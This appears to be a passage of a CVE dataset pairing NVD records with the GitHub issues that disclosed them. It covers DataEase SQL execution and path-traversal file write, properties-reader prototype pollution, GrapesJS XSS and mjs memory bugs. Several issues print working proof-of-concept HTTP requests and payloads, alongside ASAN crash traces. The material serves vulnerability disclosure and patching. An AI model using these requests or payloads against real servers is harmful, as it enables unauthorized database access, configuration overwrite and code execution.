{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/2430" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/2430" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dataease_project:dataease:1.11.1:*:*:*:*:*:*:*", "matchCriteriaId": "24D016E4-391C-45A7-B7F1-32ADEECD319D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/dataease/dataease/issues/2430
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "dataease", "dataease" ]
**DataEase 版本** 最新版 **运行方式(安装包运行 or 源码运行 ?)** 安装包运行 **浏览器版本** 任意 **Bug 描述** 任意SQL代码执行 **Bug 重现步骤(有截图更好)** 普通权限用户可调用 /dataset/table/sqlPreview 接口。 实现过程中主要需要两个参数:DataSourceId和 sql,dataSourceId可通过查看数据源获取。 ``` POST /dataset/table/sqlPreview HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN Accept-Encoding: gzip, deflate Content-Type: application/json Authorization: xxx LINK-PWD-TOKEN: null Content-Length: 95 Connection: close {"dataSourceId":"76026997-94f9-4a35-96ca-151084638969","info":"{\"sql\":\"select version()\"}"} ``` <img width="957" alt="image" src="https://user-images.githubusercontent.com/76553352/173776083-15bdc47e-728a-4eb8-9f4e-4d4e939ca577.png"> 若数据源为sql server或postgresql等,可以通过数据库提权获取数据库服务器权限。
[Bug]任意SQL代码执行
https://api.github.com/repos/dataease/dataease/issues/2430/comments
2
2022-06-15T08:08:00Z
2022-06-17T10:34:10Z
https://github.com/dataease/dataease/issues/2430
1,271,836,748
2,430
3,871
CVE-2022-34115
2022-07-22T23:15:08.183
DataEase v1.11.1 was discovered to contain a arbitrary file write vulnerability via the parameter dataSourceId.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/2428" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/releases/tag/v1.11.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/2428" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/releases/tag/v1.11.2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dataease_project:dataease:1.11.1:*:*:*:*:*:*:*", "matchCriteriaId": "24D016E4-391C-45A7-B7F1-32ADEECD319D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/dataease/dataease/issues/2428
[ "Exploit", "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ]
github.com
[ "dataease", "dataease" ]
**DataEase 版本** 最新版 **运行方式(安装包运行 or 源码运行 ?)** 安装包运行 **浏览器版本** 任意 **Bug 描述** 任意文件跨目录写入 **Bug 重现步骤(有截图更好)** 数据源驱动管理处存在文件上传接口: <img width="965" alt="image" src="https://user-images.githubusercontent.com/76553352/173771456-ddd78e08-1ffd-4023-94f9-b0844b13ffdc.png"> 查看源代码: <img width="901" alt="image" src="https://user-images.githubusercontent.com/76553352/173771551-e44ebcee-7557-4c92-8752-ab6269931fe9.png"> 直接将上传的文件以及ID进行拼接,因此可以构造包: ``` POST /driver/file/upload HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: zh-CN Accept-Encoding: gzip, deflate Authorization: xxx Content-Type: multipart/form-data; boundary=---------------------------70362338610608895491036095575 Content-Length: 1167 Origin: http://10.211.55.18 Connection: close Referer: http://10.211.55.18/ Cookie: -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="id" /../conf -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="name" 123 -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="createTime" 1654829420814 -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="type" mysql -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="driverClass" null -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="desc" -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="typeDesc" MySQL -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="showModel" show -----------------------------70362338610608895491036095575 Content-Disposition: form-data; name="file"; filename="dataease.properties" Content-Type: image/png 123 -----------------------------70362338610608895491036095575-- ``` 虽然返回包为错误,但实际上已经上传成功。 因此可以修改数据库配置文件或其他配置文件,可能会造成任意代码执行
[Bug]任意文件跨目录写入
https://api.github.com/repos/dataease/dataease/issues/2428/comments
2
2022-06-15T07:48:58Z
2022-06-17T10:34:31Z
https://github.com/dataease/dataease/issues/2428
1,271,815,035
2,428
3,872
CVE-2020-28471
2022-07-25T14:15:09.927
This affects the package properties-reader before 2.2.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/steveukx/properties/commit/0877cc871db9865f58dd9389ce99e61be05380a5" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/steveukx/properties/issues/40" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-PROPERTIESREADER-1048968" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/steveukx/properties/commit/0877cc871db9865f58dd9389ce99e61be05380a5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/steveukx/properties/issues/40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-PROPERTIESREADER-1048968" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:properties-reader_project:properties-reader:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "0EAC45CB-5911-4B1E-BE80-0FF86388F09D", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/steveukx/properties/issues/40
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "steveukx", "properties" ]
Steps to reproduce: payload.properties ``` [__proto__] polluted = polluted ``` poc.js: ``` var propertiesReader = require('properties-reader'); propertiesReader('./payload.properties'); console.log({}.polluted) // logs 'polluted' ```
Snyk - potential prototype pollution
https://api.github.com/repos/steveukx/properties/issues/40/comments
1
2020-12-30T06:53:37Z
2020-12-30T07:51:36Z
https://github.com/steveukx/properties/issues/40
776,300,399
40
3,873
CVE-2021-23451
2022-07-25T14:15:10.260
The package otp-generator before 3.0.0 are vulnerable to Insecure Randomness due to insecure generation of random one-time passwords, which may allow a brute-force attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Maheshkumar-Kakade/otp-generator/commit/b27de1ce439ae7f533cec26677e9698671275b70" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Maheshkumar-Kakade/otp-generator/issues/12" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-OTPGENERATOR-1655480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Maheshkumar-Kakade/otp-generator/commit/b27de1ce439ae7f533cec26677e9698671275b70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Maheshkumar-Kakade/otp-generator/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-OTPGENERATOR-1655480" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:otp-generator_project:otp-generator:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "9D861DA5-DFB3-4D11-AC8A-B28528D9CF40", "versionEndExcluding": "3.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "330" ]
330
https://github.com/Maheshkumar-Kakade/otp-generator/issues/12
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Maheshkumar-Kakade", "otp-generator" ]
Hi, I would like to report to you a security issue within otp-generator and I need some way to disclose it privately. You could open your DMs on Twitter or provide me with an email address.
Security issue
https://api.github.com/repos/Maheshkumar-Kakade/otp-generator/issues/12/comments
3
2021-07-16T12:25:45Z
2023-03-31T12:56:46Z
https://github.com/Maheshkumar-Kakade/otp-generator/issues/12
946,246,538
12
3,874
CVE-2022-21802
2022-07-25T14:15:10.817
The package grapesjs before 0.19.5 are vulnerable to Cross-site Scripting (XSS) due to an improper sanitization of the class name in Selector Manager.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/artf/grapesjs/commit/13e85d152d486b968265c4b8017e8901e7d89ff3" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/artf/grapesjs/issues/4411%23issuecomment-1167202709" }, { "source": "report@snyk.io", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/artf/grapesjs/releases/tag/v0.19.5" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2936781" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-GRAPESJS-2935960" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/artf/grapesjs/commit/13e85d152d486b968265c4b8017e8901e7d89ff3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/artf/grapesjs/issues/4411%23issuecomment-1167202709" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/artf/grapesjs/releases/tag/v0.19.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2936781" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-GRAPESJS-2935960" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:grapesjs:grapesjs:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "E6B41B38-278B-4B3D-9F4B-4BDD6D9466CD", "versionEndExcluding": "0.19.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/artf/grapesjs/issues/4411%23issuecomment-1167202709
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "artf", "grapesjs" ]
### GrapesJS version - [X] I confirm to use the latest version of GrapesJS ### What browser are you using? Chrome v102 ### Reproducible demo link https://jsfiddle.net/szLp8h4n ### Describe the bug **How to reproduce the bug?** 1. Select any component 2. Add class name to Selector Manager like `<a href="#"onclick='alert(123)'>check</a>` 3. After click on class name, you got alert **What is the expected behavior?** Class name should be escaped **What is the current behavior?** javascript run in class name Need add escape function to template https://github.com/artf/grapesjs/blob/dev/src/selector_manager/view/ClassTagView.ts#L13 ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
BUG: XSS when add class name to Selector Manager
https://api.github.com/repos/GrapesJS/grapesjs/issues/4411/comments
3
2022-06-27T10:48:02Z
2022-06-27T14:34:55Z
https://github.com/GrapesJS/grapesjs/issues/4411
1,285,615,447
4,411
3,875
CVE-2021-33437
2022-07-26T13:15:08.487
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/160" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/160" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/cesanta/mjs/issues/160
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5794-frozen_cb-memory-leak ASAN info: ```C ==29407==ERROR: LeakSanitizer: detected memory leaks Direct leak of 37331 byte(s) in 1 object(s) allocated from: #0 0x7f151fe52602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42ffcd in frozen_cb test/mjs-uaf/build_asan/mjs.c:12025 #2 0x4092c4 in json_parse_string test/mjs-uaf/build_asan/mjs.c:5898 #3 0x40b482 in json_parse_value test/mjs-uaf/build_asan/mjs.c:5993 #4 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #5 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #6 0x40b863 in json_parse_pair test/mjs-uaf/build_asan/mjs.c:6058 #7 0x40bc63 in json_parse_object test/mjs-uaf/build_asan/mjs.c:6070 #8 0x40b4a3 in json_parse_value test/mjs-uaf/build_asan/mjs.c:5996 #9 0x40c135 in json_doit test/mjs-uaf/build_asan/mjs.c:6083 #10 0x40f2aa in json_walk test/mjs-uaf/build_asan/mjs.c:6466 #11 0x4309d9 in mjs_json_parse test/mjs-uaf/build_asan/mjs.c:12133 #12 0x430f11 in mjs_op_json_parse test/mjs-uaf/build_asan/mjs.c:12193 #13 0x42572a in mjs_execute test/mjs-uaf/build_asan/mjs.c:9648 #14 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #15 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #16 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #17 0x7f151f80c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 37331 byte(s) leaked in 1 allocation(s). ```
AddressSanitizer: 1 memory leaks of frozen_cb()
https://api.github.com/repos/cesanta/mjs/issues/160/comments
0
2021-05-19T08:38:25Z
2021-05-19T08:38:25Z
https://github.com/cesanta/mjs/issues/160
895,159,181
160
3,876
CVE-2021-33438
2022-07-26T13:15:08.630
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in json_parse_array() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/158" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/158
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5fb78-json_parse_array-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==29997==ERROR: AddressSanitizer: stack-overflow on address 0x7ffecd8c9eb8 (pc 0x7f833297cb79 bp 0x7ffecd8ca770 sp 0x7ffecd8c9ec0 T0) #0 0x7f833297cb78 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x5fb78) #1 0x7f833297e145 in __interceptor_vsnprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61145) #2 0x7f833297e3b1 in snprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x613b1) #3 0x40a934 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5952 #4 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #5 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #6 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #7 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #8 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #9 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #10 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #11 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #12 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #13 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #14 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #15 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #16 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #17 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #18 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #19 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #20 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #21 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #22 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #23 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #24 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #25 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #26 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #27 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #28 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #29 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #30 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #31 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #32 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #33 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #34 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #35 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #36 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #37 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #38 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #39 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #40 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #41 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #42 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #43 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #44 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #45 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #46 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #47 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #48 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #49 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #50 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #51 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #52 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #53 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #54 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #55 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #56 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #57 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #58 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #59 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #60 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #61 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #62 0x40b4c4 in 